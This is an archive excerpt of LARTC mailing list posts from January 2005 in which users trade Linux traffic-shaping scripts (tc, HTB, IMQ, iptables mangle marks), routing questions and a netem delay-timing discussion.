Gerthannes wrote: > Hello, > I wrote a simple traffic shaping script (below) that should have allowed me to shape my internet traffic a bit (ppp0 - adsl 128kbit/64kbit; local interface eth0). > The script works only partially - the speed is being limited but too much. Without running this script my download rate is about 10kBytes (with second computer also downloading at about 6kBytes). After running it my download speed decreases to about 1..2kBytes and so the second computer. > Could you tell me what have I done wrong ? > > Thank you for replies. > Ixen > > -------------- > My configuration: > Celeron 450MHz, 256MB RAM > Kernel 2.6.9 patched for imq support (imq devices compiled into kernel) > iptables 1.2.11 (also patched for imq) > > Script: > #!/bin/sh > > DOWNIF='imq0' > UPIF='imq1' > rc_done=" done" > rc_failed=" failed" > > TC='/sbin/tc' > IPTABLES='/usr/sbin/iptables' > IFCONFIG='/sbin/ifconfig' > MODPROBE='/sbin/modprobe' > > return=$rc_done > > tc_reset () > { > # remove old devices if any > echo "Removing old root qdisc..." > $TC qdisc del dev $DOWNIF root > $TC qdisc del dev $UPIF root > } > > tc_status () > { > echo "========================================" > echo "[qdisc - $DOWNIF]" > $TC -s qdisc show dev $DOWNIF > echo "[qdisc - $UPIF]" > $TC -s qdisc show dev $UPIF > echo "----------------------------------------" > echo > echo "[class - $DOWNIF]" > $TC -s class show dev $DOWNIF > echo "[class - $UPIF]" > $TC -s class show dev $UPIF > } > > tc_showfilter () > { > echo "[filter - $DOWNIF]" > $TC -s filter show dev $DOWNIF > echo "[filter - $UPIF]" > $TC -s filter show dev $UPIF > } > > case "$1" in > > start) > echo "Starting traffic shaping..." > tc_reset > > # setup imq devices - imq0 for download, imq1 for upload > # $MODPROBE imq numdevs 2 > > $IFCONFIG imq0 up > $IFCONFIG imq1 up > > # ROOT DEVICE > echo " Setting root devices for $DOWNIF and $UPIF" > > # download > $TC qdisc add dev $DOWNIF root handle 1: htb default 99 > $TC qdisc add dev $DOWNIF parent 1: classid 1:10 htb rate 128kbit > # upload > $TC qdisc add dev $UPIF root handle 1: htb default 98 > $TC class add dev $UPIF parent 1: classid 1:20 htb rate 64kbit > > # ADDRESSES > echo " 192.168.0.30" > # 192.168.0.30 > $TC class add dev $DOWNIF parent 1:10 classid 1:1000 htb rate 48kbit ceil 128kbit > $TC qdisc add dev $DOWNIF parent 1:1000 handle 1000 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1000 fw classid 1:1000 > > $TC class add dev $UPIF parent 1:20 classid 1:2000 htb rate 24kbit ceil 64kbit > $TC qdisc add dev $UPIF parent 1:2000 handle 2000 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2000 fw classid 1:2000 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.30 -j MARK --set-mark 1000 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.30 -j MARK --set-mark 2000 > > # 192.168.0.178 > echo " 192.168.0.178" > $TC class add dev $DOWNIF parent 1:10 classid 1:1010 htb rate 16kbit ceil 100kbit > $TC qdisc add dev $DOWNIF parent 1:1010 handle 1010 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1010 fw classid 1:1010 > > $TC class add dev $UPIF parent 1:20 classid 1:2010 htb rate 8kbit ceil 60kbit > $TC qdisc add dev $UPIF parent 1:2010 handle 2010 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2010 fw classid 1:2010 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.178 -j MARK --set-mark 1010 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.178 -j MARK --set-mark 2010 > > # 192.168.0.55 > echo " 192.168.0.55" > $TC class add dev $DOWNIF parent 1:10 classid 1:1020 htb rate 16kbit ceil 100kbit > $TC qdisc add dev $DOWNIF parent 1:1020 handle 1020 sfq > $TC filter add dev $DOWNIF parent 1:0 protocol ip prio 200 handle 1020 fw classid 1:1020 > > $TC class add dev $UPIF parent 1:20 classid 1:2020 htb rate 8kbit ceil 60kbit > $TC qdisc add dev $UPIF parent 1:2020 handle 2020 sfq > $TC filter add dev $UPIF parent 1:0 protocol ip prio 200 handle 2020 fw classid 1:2020 > > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.55 -j MARK --set-mark 1020 > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.55 -j MARK --set-mark 2020 > > # other > echo " other..." > $TC class add dev $DOWNIF parent 1:10 classid 1:99 htb rate 100bit ceil 8kbit > $TC class add dev $UPIF parent 1:20 classid 1:98 htb rate 100bit ceil 8kbit > > # route traffic > echo " Traffic redirecting" > # download > $IPTABLES -t mangle -A POSTROUTING -d 192.168.0.0/24 -j IMQ --todev 0 > #upload > $IPTABLES -t mangle -A POSTROUTING -s 192.168.0.0/24 -j IMQ --todev 1 > > tc_status > ;; > > stop) > echo -n "Stopping traffic shaper..." > tc_reset || return=$rc_failed > echo -e "$return" > ;; > > restart|reload) > $0 stop && $0 start || return=$rc_failed > ;; > > stats|status) > tc_status > ;; > > filter) > tc_showfilter > ;; > > *) > echo "Usage: $0 {start|stop|restart|stats|filter}" > esac > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > -- ----------------------------------------------------------------------- Confidentiality Notice: This e-mail communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please notify me immediately by replying to this message and deleting it from your computer. Thank you. From junk@x-art.be Wed Jan 26 17:18:34 2005 From: junk@x-art.be (Gerry Demaret) Date: Wed, 26 Jan 2005 18:18:34 +0100 Subject: [LARTC] Weird routing problem (2 internet connections) Message-ID: <41F7D0EA.9030906@x-art.be> Hello, I have a very strange problem that I can't seem to be able to figure out. First of all: my network scheme: http://heavyg.safehex.be/network.png I have an agreement with my neighbour that I can use his wireless network to experiment with extra internet uplinks in exchange for some filesharing etc. Now I have set up a wireless router at my place, that connects to his network. All this works nicely, if I connect my laptop to that router (WRT54Gs) I can use it as a gateway, internet works, cool. So far, so good. Now, I would like to connect that router to my main gateway running GNU/Linux 2.6.10 and already providing basic routing services through eth0 and 1. I used an extra network card (eth2) to connect the WRT54Gs and assigned an IP to it in another range. Now the strange part: from the gateway I am able to ping the WRT54Gs, but I cannot telnet, ssh, htpp, whatever to it. I used tcpdump on that interface, and I see the packets going out, but not comming back.. I really don't understand. Can someone please give me a hint which routes to use? I tried following http://lartc.org/howto/lartc.rpdb.multiple-links.html but the result is the same.. only ping works. From 192.168.0.0/24 (internal network), nothing works towards 192.168.2.0/24 except pinging 192.168.2.1. Thank you in advance, Gerry. From beatlelittle@yahoo.com.cn Thu Jan 27 01:57:57 2005 From: beatlelittle@yahoo.com.cn (CcM) Date: Thu, 27 Jan 2005 09:57:57 +0800 (CST) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: Message-ID: <20050127015757.90282.qmail@web15510.mail.cnb.yahoo.com> --0-1558822556-1106791077=:86193 Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 8bit Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why? tc qdisc add dev eth0 root handle 1: htb default 13 tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1 tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20 iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21 iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12 "Catalin(ux aka Dino) BOIE" wrote: On Wed, 26 Jan 2005, CcM wrote: > It does work! Thanks! > But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? > > "Catalin(ux aka Dino) BOIE" wrote: > Use: > iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ > --set-mark 20 Because local generated packets doesn't go through PREROUTING. But, best is to use OUTPUT. > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > > > > --------------------------------- > Do You Yahoo!? > ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ --------------------------------- Do You Yahoo!? ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1558822556-1106791077=:86193 Content-Type: text/html; charset=gb2312 Content-Transfer-Encoding: 8bit
Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why?
 
tc qdisc add dev eth0 root handle 1: htb default 13
tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1
tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1
tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5
tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5
tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5
 
iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20
iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN

iptables -t mangle -A POSTROUTING -d 10.190.6.16  -p tcp --sport ftp-data -j MARK --set-mark 21
iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN
 
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11
tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12


"Catalin(ux aka Dino) BOIE" <util@deuroconsult.ro> wrote:
On Wed, 26 Jan 2005, CcM wrote:

> It does work! Thanks!
> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle?
>
> "Catalin(ux aka Dino) BOIE" wrote:
> Use:
> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \
> --set-mark 20

Because local generated packets doesn't go through PREROUTING.
But, best is to use OUTPUT.

>
> ---
> Catalin(ux aka Dino) BOIE
> catab at deuroconsult.ro
> http://kernel.umbrella.ro/
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>
>
>
> ---------------------------------
> Do You Yahoo!?
> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ

---
Catalin(ux aka Dino) BOIE
catab at deuroconsult.ro
http://kernel.umbrella.ro/


Do You Yahoo!?
×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --0-1558822556-1106791077=:86193-- From saumya@ece.ucsd.edu Thu Jan 27 02:29:54 2005 From: saumya@ece.ucsd.edu (Saumya Chandra) Date: Wed, 26 Jan 2005 18:29:54 -0800 (PST) Subject: [LARTC] Newbie question - limit bandwidth of a link. Message-ID: I just want to limit bandwidth on a particular link. Specifically, one machine (PC1) is on wired LAN and other (PC1) on a WLAN, acess point for which is on the same LAN. Both machines have static ip addresses (AD1 and AD2) and I want to limit the bandwidth utilization of certain udp traffic from PC2 to PC1. Is is possible to do this using iptables and tc (controlling from PC1 as that has both these softwares installed)? I am using iperf to monitor the bandwidth of the link. Thanks, From Denis Kot Thu Jan 27 07:42:29 2005 From: Denis Kot (Denis Kot) Date: Thu, 27 Jan 2005 09:42:29 +0200 Subject: [LARTC] negative tokens Message-ID: <3cfad9ca0501262342794e99e4@mail.gmail.com> I have this: class htb 1:29 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst 1599b cburst 1611b Sent 33233 bytes 772 pkts (dropped 0, overlimits 0) lended: 415 borrowed: 357 giants: 0 tokens: -3756376 ctokens: 128779 or this: class htb 1:21 parent 1:1 prio 0 rate 3000bit ceil 100000bit burst 1599b cburst 1611b Sent 57554 bytes 618 pkts (dropped 0, overlimits 0) lended: 193 borrowed: 425 giants: 0 tokens: -484950 ctokens: 128779 and there is more like this what=B4s wrong? this is class for imq0 device (for me this is ingres device) and I have thi= s: imq0 Link encap:UNSPEC HWaddr 00-00-00-FF-FF-00-00-00-00-00-00-00-00-00-00-00 UP RUNNING NOARP MTU:1500 Metric:1 RX packets:131111 errors:0 dropped:0 overruns:0 frame:0 TX packets:123371 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:30 RX bytes:17694200 (16.8 Mb) TX bytes:15230834 (14.5 Mb) as you can see RX bytes doesn=B4t equal to TX bytes. what=B4s wrong? --=20 Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From util@deuroconsult.ro Thu Jan 27 07:47:37 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Thu, 27 Jan 2005 09:47:37 +0200 (EET) Subject: [LARTC] Ssh flow does not go into correct class. Help! In-Reply-To: <20050127015757.90282.qmail@web15510.mail.cnb.yahoo.com> References: <20050127015757.90282.qmail@web15510.mail.cnb.yahoo.com> Message-ID: This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. ---1646943047-1200082233-1106811871=:12972 Content-Type: TEXT/PLAIN; CHARSET=iso-8859-1; FORMAT=flowed Content-Transfer-Encoding: 8BIT Content-ID: On Thu, 27 Jan 2005, CcM wrote: > Now I want to control ports with ips specified, like following, it seems not work, only --sport effect. Ftp-data goes to ips beside 10.190.6.16 also goes into 1:12 while default is 1:13. Why? > > tc qdisc add dev eth0 root handle 1: htb default 13 > tc class add dev eth0 parent 1: classid 1:1 htb rate 80000kbit ceil 80000kbit prio 1 > tc class add dev eth0 parent 1:1 classid 1:11 htb rate 40kbit ceil 40kbit prio 1 > tc class add dev eth0 parent 1:1 classid 1:12 htb rate 800kbit ceil 1600kbit prio 1 > tc class add dev eth0 parent 1:1 classid 1:13 htb rate 70000kbit ceil 80000kbit prio 1 > tc qdisc add dev eth0 parent 1:11 handle 111: sfq perturb 5 > tc qdisc add dev eth0 parent 1:12 handle 112: sfq perturb 5 > tc qdisc add dev eth0 parent 1:13 handle 113: sfq perturb 5 > > iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j MARK --set-mark 20 > iptables -t mangle -A OUTPUT -p tcp -m tcp --sport 22 -j RETURN > > iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j MARK --set-mark 21 > iptables -t mangle -A POSTROUTING -d 10.190.6.16 -p tcp --sport ftp-data -j RETURN I bet you use passive mode in ftp so you get a weird port, not ftp-data (20). ftp is tricky to match. You can use this: iptables -t mangle -A POSTROUTING -d x.x.x.x -m helper --helper ftp \ -j MARK --set-mark 21 This will mark with 21 all ftp control+data connections. > > tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 20 fw flowid 1:11 > tc filter add dev eth0 parent 1:0 prio 1 protocol ip handle 21 fw flowid 1:12 > > > "Catalin(ux aka Dino) BOIE" wrote: > On Wed, 26 Jan 2005, CcM wrote: > >> It does work! Thanks! >> But many articles write like what I did, what's the difference between POSTROUTING and PREROUTING. I mean I know these are two hook point in ip stack, but why should be POSTROUTING here when do mangle? >> >> "Catalin(ux aka Dino) BOIE" wrote: >> Use: >> iptables -t mangle -A POSTROUTING -p tcp -m tcp --sport 22 -j MARK \ >> --set-mark 20 > > Because local generated packets doesn't go through PREROUTING. > But, best is to use OUTPUT. > >> >> --- >> Catalin(ux aka Dino) BOIE >> catab at deuroconsult.ro >> http://kernel.umbrella.ro/ >> _______________________________________________ >> LARTC mailing list / LARTC@mailman.ds9a.nl >> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ >> >> >> >> --------------------------------- >> Do You Yahoo!? >> ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ > > --- > Catalin(ux aka Dino) BOIE > catab at deuroconsult.ro > http://kernel.umbrella.ro/ > > > --------------------------------- > Do You Yahoo!? > ×¢²áÊÀ½çÒ»Á÷Æ·ÖʵÄÑÅ»¢Ãâ·ÑµçÓÊ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ---1646943047-1200082233-1106811871=:12972-- From sanjeev_ravindran@linuxmail.org Thu Jan 27 07:59:12 2005 From: sanjeev_ravindran@linuxmail.org (sanjeev ravindran) Date: Thu, 27 Jan 2005 15:59:12 +0800 Subject: [LARTC] Newbie question - limit bandwidth of a link. Message-ID: <20050127075912.D236223CF7@ws5-3.us4.outblaze.com> Hi, You can use tc tool to create a classful queue like HTB.. Then add a filter= for your traffic... Refer Linux Qos How to ?.. Rgds, Sanjeev ----- Original Message ----- From: "Saumya Chandra" To: lartc@mailman.ds9a.nl Subject: [LARTC] Newbie question - limit bandwidth of a link. Date: Wed, 26 Jan 2005 18:29:54 -0800 (PST) >=20 >=20 >=20 > I just want to limit bandwidth on a particular link. Specifically, one > machine (PC1) is on wired LAN and other (PC1) on a WLAN, acess point for > which is on the same LAN. Both machines have static ip addresses (AD1 and > AD2) and I want to limit the bandwidth utilization of certain udp traffic > from PC2 to PC1. Is is possible to do this using iptables and tc > (controlling from PC1 as that has both these softwares installed)? I am > using iperf to monitor the bandwidth of the link. >=20 > Thanks, > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ --=20 ______________________________________________ Check out the latest SMS services @ http://www.linuxmail.org=20 This allows you to send and receive SMS through your mailbox. Powered by Outblaze From Denis Kot Thu Jan 27 11:33:16 2005 From: Denis Kot (Denis Kot) Date: Thu, 27 Jan 2005 13:33:16 +0200 Subject: [LARTC] tc.phps Message-ID: <3cfad9ca05012703337f45ceec@mail.gmail.com> hello found this script in maillist archive how can I use this to create all class on one graph? not like for now it is one graph for each class. -- Denis Kot denis?jabber.org.by ICQ: 13680126 Mobil: +375 29 6-1234-78 From andy.furniss@dsl.pipex.com Thu Jan 27 12:37:53 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 27 Jan 2005 12:37:53 +0000 Subject: [LARTC] Re: Confuse, putting packets in wrong mangle table. In-Reply-To: <200501261804.53584.rio@martin.mu> References: <200501191657.15767.rio@martin.mu> <41F63E7B.30202@dsl.pipex.com> <200501261804.53584.rio@martin.mu> Message-ID: <41F8E0A1.4060108@dsl.pipex.com> Rio Martin. wrote: > On Tuesday 25 January 2005 12:41, Andy Furniss wrote: > >>Is there only one proxy running? >> >>>I need to shape incoming traffic to both of these ips but i am affraid i >>>have to face that i am not able to shape traffic which is generate from >>>this box unless those two IPs were outside the box. >> >>Maybe true - maybe not you would need to test with imq. >>There is also a kernel option to do with nat of local connections. >> >>>If i have one more public IP than i should not so much worry about, cause >>>i can shape it using IMQ. > > > > I'll make it simple for you as possible. > > i have linux box which have eth0 220.1.1.1 as primary ip and aliasses: eth0:1 > 192.168.1.1 , eth0:1 192.168.1.2 > > Both 192.168.1.1 & 192.168.1.2 NATed to 220.1.1.1 > OKay, now my question is: > > How do i manage and limit traffic generated from those ips (192.168.1.1 & > 192.168.1.2) ? Not just traffic outside, but traffic coming to those ips from > Internet. > I found it so difficult because traffic coming from internet to eth0 will be > using 220.1.1.1 not 192.168.x.x If you use IMQ and get it to hook after NAT in PREROUTING then forwarded traffic should have been denatted and have local addresses. You can use TC filters to classify for htb etc. Traffic from internet to squid will probably have 220. IP address. If you want to try a way without IMQ then AIUI you can patch squid so you can classify hit/miss traffic and then you could shape traffic as egress on eth0. I don't use squid - but I assume here it limits the rate it pulls miss pages to the rate that client requests. http://www.docum.org/docum.org/faq/cache/65.html Andy. From andy.furniss@dsl.pipex.com Thu Jan 27 13:21:25 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Thu, 27 Jan 2005 13:21:25 +0000 Subject: [LARTC] tail and head drop qdiscs In-Reply-To: <1106682109.5611.9.camel@localhost.localdomain> References: <1106170939.10019.23.camel@localhost.localdomain> <41F63C51.9050207@dsl.pipex.com> <1106682109.5611.9.camel@localhost.localdomain> Message-ID: <41F8EAD5.1080706@dsl.pipex.com> vincent perrier wrote: >>vincent perrier wrote: >> >>>I think that there are no qdiscs that permit to drop the oldest >>>frame of a queue when this queue is full ... > > >>What sort of thing do you want this for? >>... >>Andy. >> > > > Very low rate (satellite links for example) and strict priority can > lead to messages waiting for a chance to be transmitted and getting > old in low prio queues as higher priority messages take all the > bandwidth. > Vincent. Ahh - if the messages established tcp then I don't think it will make any difference. If the messages are udp then I suppose it could help a bit - depends what you mean by messages. Andy. From andre.correa@pobox.com Thu Jan 27 14:03:59 2005 From: andre.correa@pobox.com (Andre Correa) Date: Thu, 27 Jan 2005 12:03:59 -0200 Subject: [LARTC] Another year starts... Message-ID: <41F8F4CF.9070702@pobox.com> Hi list, today it turns 1 year since we started LinuxIMQ's mailling list and brought IMQ "back to life". Since then we've being trying to keep IMQ patches updated with new kernel/iptables versions and to help users the best we could. I would really like to thank all of those good mates who helped, one way or another, including people from this list and from LARTC. It was an interesting year for me, meeting some cool people and learning a lot. I'm glad we were able to get things up-to-date and made some advancements. I have to say I'm sorry I couldn't find more time for IMQ/documentation/iproute2/kernel stuff/user problem solving. We are aware that many issues were not addressed yet, I plan to release a wish list soon, and documentation is still pending review and clarification. Let's try to find more time next year to make things better and keep learning. As usual any help is appreciated and wanted. Thank you all. Sincerily. Andre Correa ----------------------------------------------------------------------- Confidentiality Notice: This e-mail communication and any attachments may contain confidential and privileged information for the use of the designated recipients named above. If you are not the intended recipient, you are hereby notified that you have received this communication in error and that any review, disclosure, dissemination, distribution or copying of it or its contents is prohibited. If you have received this communication in error, please notify me immediately by replying to this message and deleting it from your computer. Thank you. From pedro.mindlin@poli.usp.br Thu Jan 27 14:13:17 2005 From: pedro.mindlin@poli.usp.br (Pedro Ancona Lopez Mindlin) Date: Thu, 27 Jan 2005 12:13:17 -0200 Subject: [LARTC] netem bug? Message-ID: <41F8F6FD.6040408@poli.usp.br> Hi all, I'm running some tests with netem and I noticed some strange behaviour that looks like a bug: I'm pinging another machine and adding delay with netem. When I tell netem to give me a 10ms delay, it works fine. The problem is that when I ask for a 11ms delay, it gives me 20ms! It happens for any value between 11ms an 20ms, and it repeats for values over 20ms, now rounding up to 30ms. Here is an example: # ping x.x.x.x PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=0.197 ms 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=0.100 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=0.081 ms 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=0.099 ms # tc qdisc add dev eth0 root netem delay 10ms # ping x.x.x.x PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=1.11 ms 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=9.04 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=9.24 ms 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=10.0 ms # tc qdisc change dev eth0 root netem delay 11ms # ping x.x.x.x PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=13.1 ms 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=20.0 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=20.0 ms 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=20.0 ms # tc qdisc change dev eth0 root netem delay 23ms # ping x.x.x.x PING x.x.x.x (x.x.x.x) 56(84) bytes of data. 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=22.2 ms 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=29.8 ms 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=29.1 ms 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=30.0 ms # uname -a Linux yyy 2.4.27-1-386 #1 Fri Sep 3 06:24:46 UTC 2004 i686 GNU/Linux Is this a known bug? Is there any fix? I also noticed that the first ping has always a smaller value. Can someone explain that? Thanks, Pedro. From util@deuroconsult.ro Thu Jan 27 14:42:27 2005 From: util@deuroconsult.ro (Catalin(ux aka Dino) BOIE) Date: Thu, 27 Jan 2005 16:42:27 +0200 (EET) Subject: [LARTC] netem bug? In-Reply-To: <41F8F6FD.6040408@poli.usp.br> References: <41F8F6FD.6040408@poli.usp.br> Message-ID: > Hi all, > > I'm running some tests with netem and I noticed some strange behaviour that > looks like a bug: I'm pinging another machine and adding delay with netem. > When I tell netem to give me a 10ms delay, it works fine. The problem is that > when I ask for a 11ms delay, it gives me 20ms! It happens for any value > between 11ms an 20ms, and it repeats for values over 20ms, now rounding up to > 30ms. > > Here is an example: > > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. > 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=0.197 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=0.100 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=0.081 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=0.099 ms > > # tc qdisc add dev eth0 root netem delay 10ms > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. > 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=1.11 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=9.04 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=9.24 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=10.0 ms > > > # tc qdisc change dev eth0 root netem delay 11ms > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. > 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=13.1 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=20.0 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=20.0 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=20.0 ms > > # tc qdisc change dev eth0 root netem delay 23ms > # ping x.x.x.x > PING x.x.x.x (x.x.x.x) 56(84) bytes of data. > 64 bytes from x.x.x.x: icmp_seq=1 ttl=64 time=22.2 ms > 64 bytes from x.x.x.x: icmp_seq=2 ttl=64 time=29.8 ms > 64 bytes from x.x.x.x: icmp_seq=3 ttl=64 time=29.1 ms > 64 bytes from x.x.x.x: icmp_seq=4 ttl=64 time=30.0 ms > > # uname -a > Linux yyy 2.4.27-1-386 #1 Fri Sep 3 06:24:46 UTC 2004 i686 GNU/Linux > > > Is this a known bug? Is there any fix? I also noticed that the first ping has > always a smaller value. Can someone explain that? The "problem" is the 2.4 kernel because HZ is 100. Ping is not rescheduled quickly enough to measure correctly the rtt. On my 2.6 kernel (HZ=1000) it work almost perfect. Hope it helps. > > Thanks, > > Pedro. > > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ From lartc@nospam.otaku42.de Thu Jan 27 15:09:30 2005 From: lartc@nospam.otaku42.de (Michael Renzmann) Date: Thu, 27 Jan 2005 16:09:30 +0100 Subject: [LARTC] netem bug? In-Reply-To: References: <41F8F6FD.6040408@poli.usp.br> Message-ID: <41F9042A.9090400@otaku42.de> Hi. Catalin(ux aka Dino) BOIE wrote: > The "problem" is the 2.4 kernel because HZ is 100. That was my idea, too. > On my 2.6 kernel (HZ=1000) it work almost perfect. If the OP thinks of changing HZ, the following links might be a good help: http://www.plumlocosoft.com/kernel/ (especially 013-j64.diff.bz2 and 014-vhz.diff.bz2) http://kerneltrap.org/node/464/1528 The mentioned patches allow to change HZ to something else than 100 while retaining compatibility to userspace and other stuff that might rely on HZ being 100. Note that kernel image as well as (most probably all) modules have to be recompiled and replaced for the patch to take effect. Bye, Mike From stef.coene@docum.org Thu Jan 27 08:24:47 2005 From: stef.coene@docum.org (Stef Coene) Date: Thu, 27 Jan 2005 09:24:47 +0100 Subject: [LARTC] negative tokens In-Reply-To: <3cfad9ca0501262342794e99e4@mail.gmail.com> References: <3cfad9ca0501262342794e99e4@mail.gmail.com> 